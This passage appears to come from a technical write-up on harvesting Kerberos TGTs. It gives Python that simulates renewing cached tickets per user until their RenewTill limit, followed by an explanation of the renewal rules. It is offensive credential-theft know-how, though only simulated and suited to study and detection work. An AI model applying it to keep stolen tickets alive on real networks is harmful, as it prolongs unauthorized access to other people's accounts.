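        if target_user and x["user"].split("@")[0].lower() != target_user.lower():
            continue
        if ident(x) not in seen:
            seen.add(ident(x))
            new.append(x)
    return new


def renew(x, now, lifetime=timedelta(hours=10)):
    """Simulated TGS renewal: the new lifetime starts now and is capped at renew-till,
    which a renewal never extends."""
    return dict(x, start=now, end=min(now + lifetime, x["renew_till"]))


def harvest_tick(cache, observed, now, interval):
    """harvest: merge observed TGTs into the per-user cache, renew those that
    would expire before the next tick (only while still valid and inside the
    renewal window) and drop those that can no longer be renewed.
    Returns (renewed_users, dropped_users)."""
    for x in observed:
        cache[x["user"].lower()] = x        # newest observation per user wins (assumption)
    renewed, dropped = [], []
    for user, x in list(cache.items()):
        if x["end"] > now + interval:
            continue                        # still good at the next tick, nothing to do
        if x["end"] > now and now < x["renew_till"]:
            cache[user] = renew(x, now)     # a ticket can only be renewed before it expires
            renewed.append(user)
        else:
            del cache[user]                 # expired, or past its renewal limit
            dropped.append(user)
    return renewed, dropped


def usable(cache, now):
    """Users whose cached TGT is valid at `now` (what /displayinterval prints)."""
    return sorted(x["user"] for x in cache.values() if x["start"] <= now < x["end"])
```

The renewal condition is the part worth getting right in practice: a TGT that has already expired cannot be renewed regardless of its RenewTill, and RenewTill itself never moves, so a harvested TGT is only ever good until the renewal limit the KDC stamped on the original (seven days in the listings above).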